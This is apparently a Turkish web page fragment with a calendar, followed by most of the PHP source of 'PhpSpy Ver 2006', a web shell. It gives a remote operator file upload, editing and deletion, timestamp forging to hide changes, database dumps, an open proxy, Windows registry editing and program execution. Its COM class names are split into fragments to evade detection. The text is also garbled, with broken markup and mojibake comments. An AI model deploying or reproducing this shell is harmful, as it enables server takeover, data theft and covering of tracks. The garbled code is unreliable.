| Takvim |
| |
| « Mart 2010 » |
|---|
| Pt | Sa | Çr | Pr | Cu | Ct | Pz |
|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | | 8 | 9 | 10 | 11 | 12 | 13 | 14 | | 15 | 16 | 17 | 18 | 19 | 20 | 21 | | 22 | 23 | 24 | 25 | 26 | 27 | 28 | | 29 | 30 | 31 | |
|
|
|
Sohbet Odamız Açılmıştır Herkezi Bekleriz
";
# echo "×¢Ïú³É¹¦......ÈiÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌGò½çÃæ >>> ";
echo "::you are logged out::Clich to return >>> ";
exit;
}
if ($_POST['do'] == 'login') {
$thepass=trim($_POST['adminpass']);
if ($admin['pass'] == $thepass) {
setcookie ("adminpass",$thepass,time()+(1*24*3600));
echo "";
# echo "µÇ½³É¹¦......ÈiÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌGò½çÃæ >>> ";
echo "loging in......if not redirected click here>>> ";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== basic checks =====================*/
//magic_quotes_gpc check
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
//PHPINFO
if ($_GET['action'] == "phpinfo") {
# echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊiÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>";
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() phpinfo<PHP Info>";
exit;
}
// ÔÚÏß´úÀí
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo ($proxycontents) ? $proxycontents : "
»ñÈ¡ URL ÄÚÈIʧ°Ü ";
exit;
}
// ÏÂÔØÎļs
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP Generated Data');
header('Content-Length: '.filesize($downfile));
@readfile($downfile);
exit;
}
}
// Ö±½ÓÏÂÔر¸·IÊi¾I¿â
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Cant Connect");
@mysql_select_db($dbname) or die("Database error");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "³ö´í: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// ³ÌGòĿ¼
$pathname=str_replace('\\','/',dirname(__FILE__));
// »ñÈ¡µ±Ç°Â·¾¶
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// ÅG¶Ï¶ÁG´Çé¿ö
$dir_writeable = (dir_writeable($nowpath)) ? "id" : "id";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | edit registry" : "";
$tb = new FORMS;
?>
PhpSpy Ver 2006
tableheader();
# translating this is a bitch
$tb->tdbody('| '.$_SERVER['HTTP_HOST'].' | '.$_SERVER['REMOTE_ADDR'].' |
','center','top');
$tb->tdbody('Logout | Dir | PHP EnvVars | ProxySurf'.$reg.$phpinfo.' | WebShell | SQL Query | MySQL Backup');
$tb->tablefooter();
?>
headerform(array('method'=>'GET','content'=>'Location: '.$pathname.'
current: ('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
ChDir: '.$tb->makeinput('dir').' '.$tb->makeinput('','Go','','submit').' c:\bla [win] :: /folder [*nix]'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Upload: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Go','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'EditFile: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','Go','','submit')));
$tb->headerform(array('content'=>'Create Directory: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','Go','','submit')));
?>
\n";
// ɾ³iÎļs
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." ɾ³i³É¹¦!" : "Îļsɾ³iʧ°Ü!";
} else {
echo basename($delfile)." ÎļsÒѲ»´æÔÚ!";
}
}
// ɾ³iĿ¼
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir Ŀ¼ÒѲ»´æÔÚ!";
} else {
echo (deltree($deldirs)) ? "Ŀ¼ɾ³i³É¹¦!" : "Ŀ¼ɾ³iʧ°Ü!";
}
}
// ´´½¨Ä¿Â¼
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "¸ÃĿ¼ÒÑ´æÔÚ!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!";
@chmod("$mkdirs",0777);
}
}
}
// ÉÏ´«Îļs
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
}
// ±à¼Îļs
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
$filename="$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "G´ÈëÎļs³É¹¦!" : "G´Èëʧ°Ü!";
@fclose($fp);
} else {
echo "ÇëÊäÈëÏëÒª±à¼µÄÎļsÃû!";
}
}
// ±à¼ÎļsÊôGÔ
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "ÊôGÔGS¸Ä³É¹¦!" : "GS¸Äʧ°Ü!";
echo " Îļs ".$file." GS¸ÄºóµÄÊôGÔΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "ÇëÊäÈëÏëÒªÉèÖõÄÊôGÔ!";
}
}
// Îļs¸ÄÃû
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." ÒѾ´æÔÚ,ÇëÖØGÂÊäÈëÒ»¸ö!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ³É¹¦¸ÄÃûΪ ".$_POST['newname']." !" : "ÎļsÃûGS¸Äʧ°Ü!";
}
} else {
echo "ÇëÊäÈëÏëÒª¸ÄµÄÎļsÃû!";
}
}
// ¿Ë¡ʱ¼ä
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "ÒªGS¸ÄµÄÎļs²»´æÔÚ!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "Òª²ÎÕÕµÄÎļs²»´æÔÚ!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." Change Date ".date("Y-m-d H:i:s",$time)." !" : "ÎļsµÄGS¸Äʱ¼äGS¸Äʧ°Ü!";
}
}
}
// ×Ô¶¨Òåʱ¼ä
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
# echo "ÒªGS¸ÄµÄÎļs²»´æÔÚ!";
# bleh
echo "Warning - you are changing the date / time!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." Change Date ".date("Y-m-d H:i:s",$time)." !" : "ÎļsµÄGS¸Äʱ¼äGS¸Äʧ°Ü!";
}
}
}
// Á¬½ÓMYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "Êi¾I¿âÁ¬½Ó³É¹¦!";
mysql_close();
} else {
echo mysql_error();
}
}
// Ö´GGSQLÓï¾ä
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Êi¾I¿âÁ¬½Óʧ°Ü");
@mysql_select_db($dbname) or die("Ñ¡ÔñÊi¾I¿âʧ°Ü");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQLÓï¾ä³É¹¦Ö´GG!" : "³ö´í: ".mysql_error();
mysql_close();
}
// ±¸·I²Ù×÷
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "ÇëÑ¡ÔñÓû±¸·IµÄÊi¾I±íºÍ±¸·I·½Ê½!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Êi¾I¿âÁ¬½Óʧ°Ü");
@mysql_select_db($dbname) or die("Ñ¡ÔñÊi¾I¿âʧ°Ü");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "³ö´í: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "Êi¾I¿âÒѳɹ¦±¸·Iµ½ ".$path."";
mysql_close();
} else {
echo "±¸·Iʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļs¼GÊÇ·ñ¾ßÓG¿ÉG´È¨ÏS!";
}
}
}
}
// ´ò°üÏÂÔØ PS:ÎļsÌ«´ó¿ÉÄܷdz£Âi
// Thx : G¡»¨
elseif($downrar) {
if (!empty($dl)) {
$dfiles="";
foreach ($dl AS $filepath=>$value) {
$dfiles.=$filepath.",";
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(",",$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."_Files.tar.gz");
echo $code;
exit;
} else {
echo "ÇëÑ¡ÔñÒª´ò°üÏÂÔصÄÎļs!";
}
}
// Shell.Application ÔËGG³ÌGò
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "³ÌGòÒѾ³É¹¦Ö´GG!" : "³ÌGòÔËGGʧ°Ü!";
}
// ²é¿´PHPÅäÖòÎÊi×´¿ö
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "ÅäÖòÎÊi ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname'])."";
}
// ¶Áȡע²á±í
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// G´Èë×¢²á±í
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "G´Èë×¢²á±í½¡Öµ³É¹¦!" : "G´Èë ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ°Ü!";
}
// ɾ³i×¢²á±í
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "ɾ³i×¢²á±í½¡Öµ³É¹¦!" : "ɾ³i ".$_POST['delregname']." ʧ°Ü!";
}
else {
echo "Links: Security Angel <--This script home ::: [Exploitlabs] Security / Penetration Testing ::: illmob ...in your face";
}
echo "\n";
//*===================== Ö´GG²Ù×÷ ½áÊø =====================*
// table data?
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
?>
| File |
Accessed |
Modified |
Size |
Perms |
Acion/b> |
\n";
echo " [$file] | \n";
echo " $ctime | \n";
echo " $mtime | \n";
echo " <dir> | \n";
echo " $dirperm | \n";
echo " FOLDER DELETE - Caution !!! | \n";
echo " | \n";
$dir_i++;
} else {
if($file=="..") {
echo "\n";
echo " | Up one Directory | \n";
echo " \n";
}
}
}
}// while
@closedir($dirs);
?>
|
\n";
echo " \n";
}// end dir
elseif ($_GET['action'] == "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
$action = "?dir=".urlencode($dir)."&editfile=".$editfile;
$tb->tableheader();
$tb->formheader($action,'G½¨/±à¼Îļs');
$tb->tdbody('Filename: '.$tb->makeinput('editfilename',$filename).' Edit below');
$tb->tdbody($tb->maketextarea('filecontent',$contents));
$tb->makehidden('do','doeditfile');
$tb->formfooter('1','30');
}//end editfile
elseif ($_GET['action'] == "rename") {
$nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']);
$action = "?dir=".urlencode($dir)."&fname=".urlencode($fname);
$tb->tableheader();
$tb->formheader($action,'Back to');
$tb->makehidden('oldname',$dir."/".$nowfile);
$tb->makehidden('dir',$dir);
$tb->tdbody('Original name: '.basename($nowfile));
$tb->tdbody('New name: '.$tb->makeinput('newname'));
$tb->makehidden('do','rename');
$tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'Back to');
$tb->tdbody('#chmod '.$file.' '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'¿Ë¡Îļs×îºóGS¸Äʱ¼ä');
$tb->tdbody("GS¸ÄÎļs: ".$tb->makeinput('curfile',$file,'readonly')." ¡ú Ä¿±êÎļs: ".$tb->makeinput('tarfile','GèÌîÍêÕû·¾¶¼°ÎļsÃû'),'center','2','30');
$tb->makehidden('do','domodtime');
$tb->formfooter('','30');
$tb->formheader($action,'×Ô¶¨ÒåÎļs×îºóGS¸Äʱ¼ä');
$tb->tdbody(' - ÓGG§µÄʱ¼ä´ÁµäGÍ·¶Î§ÊÇ´Ó¸ñÁÖÍsÖÎʱ¼ä 1901 Äê 12 Ô 13 ÈÕ GÇÆÚÎå 20:45:54 µ½ 2038Äê 1 Ô 19 ÈÕ GÇÆÚ¶s 03:14:07
(¸ÃÈÕÆÚ¸ù¾I 32 λÓG·ûºÅÕûÊiµÄ×îG¡ÖµºÍ×î´óÖµ¶øÀ´) - ˵Ã÷: ÈÕÈ¡ 01 µ½ 30 Ö®¼ä, ʱȡ 0 µ½ 24 Ö®¼ä, ·ÖºÍÃëÈ¡ 0 µ½ 60 Ö®¼ä!
','left');
$tb->tdbody('µ±Ç°ÎļsÃû: '.$file);
$tb->makehidden('curfile',$file);
$tb->tdbody('GS¸ÄΪ: '.$tb->makeinput('year','1984','','text','4').' Äê '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' Ô '.$tb->makeinput('data','18','','text','2').' ÈÕ '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' ·Ö '.$tb->makeinput('second','00','','text','2').' Ãë','center','2','30');
$tb->makehidden('do','modmytime');
$tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
$action = "??action=shell&dir=".urlencode($dir);
$tb->tableheader();
$tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo " \n";
}
echo "
|
